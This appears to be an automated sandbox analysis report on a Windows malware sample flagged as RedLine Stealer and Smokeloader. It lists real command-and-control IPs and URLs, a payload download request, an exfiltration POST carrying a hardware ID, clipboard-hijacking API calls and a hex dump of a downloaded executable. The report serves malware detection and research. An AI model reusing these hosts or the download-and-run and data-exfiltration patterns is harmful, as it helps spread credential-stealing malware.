HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 16:42:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 10 Dec 2024 16:30:01 GMTETag: "4a000-628ecfe24ce67"Accept-Ranges: bytesContent-Length: 303104Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 59 67 15 b8 1d 06 7b eb 1d 06 7b eb 1d 06 7b eb 03 54 ff eb 01 06 7b eb 03 54 ee eb 09 06 7b eb 03 54 f8 eb 45 06 7b eb 3a c0 00 eb 1a 06 7b eb 1d 06 7a eb 74 06 7b eb 03 54 f1 eb 1c 06 7b eb 03 54 ef eb 1c 06 7b eb 03 54 ea eb 1c 06 7b eb 52 69 63 68 1d 06 7b eb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 3d 89 df 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 02 00 00 1e 3f 00 00 00 00 00 f7 14 00 00 00 10 00 00 00 00 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 42 00 00 04 00 00 17 1a 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 18 03 00 3c 00 00 00 00 f0 40 00 c8 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cc ef 02 00 00 10 00 00 00 f0 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4c 20 00 00 00 00 03 00 00 22 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 b0 3d 00 00 30 03 00 00 6c 00 00 00 16 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c8 1c 01 00 00 f0 40 00 00 1e 01 00 00 82 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.89Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /45c616e921a794b8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJECGDGCBKECAKFBGCHost: 92.255.57.89Content-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 44 41 38 38 32 30 43 34 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 2d 2d 0d 0a Data Ascii: ------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="hwid"C0DA8820C40F807656615------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="build"default------DGIJECGDGCBKECAKFBGC--

Source: Joe Sandbox View

IP Address: 104.21.56.70 104.21.56.70

Source: Joe Sandbox View

ASN Name: TELSPRU TELSPRU

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49700 -> 176.113.115.19:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49699 -> 104.21.56.70:443

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19

Source: C:\Users\user\Desktop\ief722WreR.exe

Code function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_004029F4

Source: global traffic	HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic	HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.89Connection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: post-to-me.com

Source: unknown

HTTP traffic detected: POST /45c616e921a794b8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJECGDGCBKECAKFBGCHost: 92.255.57.89Content-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 44 41 38 38 32 30 43 34 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 2d 2d 0d 0a Data Ascii: ------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="hwid"C0DA8820C40F807656615------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="build"default------DGIJECGDGCBKECAKFBGC--

Source: ief722WreR.exe, ief722WreR.exe, 00000000.00000003.3546343202.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, ief722WreR.exe, 00000000.00000003.1296872109.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, ief722WreR.exe, 00000000.00000003.1296872109.0000000000BA0000.00000004.00000020.00020000.00000000.sdmp, ief722WreR.exe, 00000000.00000002.3676687673.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, ief722WreR.exe, 00000000.00000002.3677983339.0000000003200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
Source: ief722WreR.exe, 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
Source: ief722WreR.exe, 00000000.00000002.3677983339.0000000003200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeM
Source: ief722WreR.exe, 00000000.00000003.1296872109.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exexr
Source: DADE.tmp.exe, 00000008.00000002.1934043928.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmp, DADE.tmp.exe, 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://92.255.57.89
Source: DADE.tmp.exe, 00000008.00000002.1934122632.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/
Source: DADE.tmp.exe, 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/2b
Source: DADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.php
Source: DADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.phpE
Source: DADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.phpQ
Source: DADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.phpwininit.exe
Source: DADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dll
Source: DADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dllexe
Source: DADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dlll
Source: DADE.tmp.exe, 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dllll
Source: DADE.tmp.exe, 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://92.255.57.89AKFBGC
Source: DADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://92.255.57.89smss.exe
Source: Amcache.hve.13.dr	String found in binary or memory: http://upx.sf.net
Source: ief722WreR.exe, 00000000.00000002.3676289540.0000000000B6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/
Source: ief722WreR.exe	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: ief722WreR.exe, 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
Source: ief722WreR.exe, 00000000.00000002.3676289540.0000000000B6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699

Source: unknown

HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.7:49699 version: TLS 1.2

Source: C:\Users\user\Desktop\ief722WreR.exe

Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,

0_2_004016DF

Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_004016DF
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_02481942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_02481942

Source: C:\Users\user\Desktop\ief722WreR.exe

0_2_004016DF

Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe

Code function: 8_2_004097A0 memset,memset,lstrcatA,lstrcatA,lstrcatA,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlenA,wsprintfA,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,

8_2_004097A0

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000008.00000002.1934099181.0000000000A58000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3676143282.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_02482361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,		0_2_02482361
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_02482605 NtdllDefWindowProc_W,PostQuitMessage,		0_2_02482605

Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_00428022	0_2_00428022
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_004071AB	0_2_004071AB
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_004373D9	0_2_004373D9
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_0042D4EE	0_2_0042D4EE
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_00427484	0_2_00427484
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_00428560	0_2_00428560
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_0043D678	0_2_0043D678
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_004166AF	0_2_004166AF
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_00413725	0_2_00413725
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_004277F6	0_2_004277F6
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_0040E974	0_2_0040E974
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_0042EAE0	0_2_0042EAE0
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_00427AA0	0_2_00427AA0
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_00418AAF	0_2_00418AAF
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_00436CBF	0_2_00436CBF
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_00427D67	0_2_00427D67
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_00413F0B	0_2_00413F0B
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_00B040B7	0_2_00B040B7
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024A8289	0_2_024A8289
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024AED47	0_2_024AED47
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_02494172	0_2_02494172
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024A76EB	0_2_024A76EB
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024AD755	0_2_024AD755
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024A87C7	0_2_024A87C7
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024A7A5D	0_2_024A7A5D
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_0248EBDB	0_2_0248EBDB
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_02496916	0_2_02496916
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_0249398C	0_2_0249398C
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024B6F26	0_2_024B6F26
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024A7FCE	0_2_024A7FCE
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024AED47	0_2_024AED47
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024A7D07	0_2_024A7D07
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_02498D16	0_2_02498D16
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009F4B37	8_2_009F4B37

Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: String function: 00404980 appears 317 times
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: String function: 00410720 appears 53 times
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: String function: 02490987 appears 53 times
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: String function: 0040F903 appears 36 times
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: String function: 0040FDB2 appears 125 times
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: String function: 02490019 appears 121 times

Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 564 -s 1096

Source: ief722WreR.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: DADE.tmp.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: ief722WreR.exe	Binary or memory string: OriginalFileName vs ief722WreR.exe
Source: ief722WreR.exe, 00000000.00000003.1241468211.00000000024F0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs ief722WreR.exe
Source: ief722WreR.exe, 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs ief722WreR.exe
Source: ief722WreR.exe, 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs ief722WreR.exe

Source: ief722WreR.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000008.00000002.1934099181.0000000000A58000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3676143282.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: ief722WreR.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DADE.tmp.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/7@1/3

Source: C:\Users\user\Desktop\ief722WreR.exe

Code function: 0_2_00AF9C8E CreateToolhelp32Snapshot,Module32First,

0_2_00AF9C8E

Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe

Code function: 8_2_009ECE47 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

8_2_009ECE47

Source: C:\Users\user\Desktop\ief722WreR.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\track_prt[1].htm

Jump to behavior

Source: C:\Users\user\Desktop\ief722WreR.exe	Mutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess564

Source: C:\Users\user\Desktop\ief722WreR.exe

File created: C:\Users\user~1\AppData\Local\Temp\DADE.tmp

Jump to behavior

Source: ief722WreR.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ief722WreR.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ief722WreR.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ief722WreR.exe

ReversingLabs: Detection: 44%

Source: unknown	Process created: C:\Users\user\Desktop\ief722WreR.exe "C:\Users\user\Desktop\ief722WreR.exe"
Source: C:\Users\user\Desktop\ief722WreR.exe	Process created: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe "C:\Users\user~1\AppData\Local\Temp\DADE.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 564 -s 1096
Source: C:\Users\user\Desktop\ief722WreR.exe	Process created: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe "C:\Users\user~1\AppData\Local\Temp\DADE.tmp.exe"	Jump to behavior

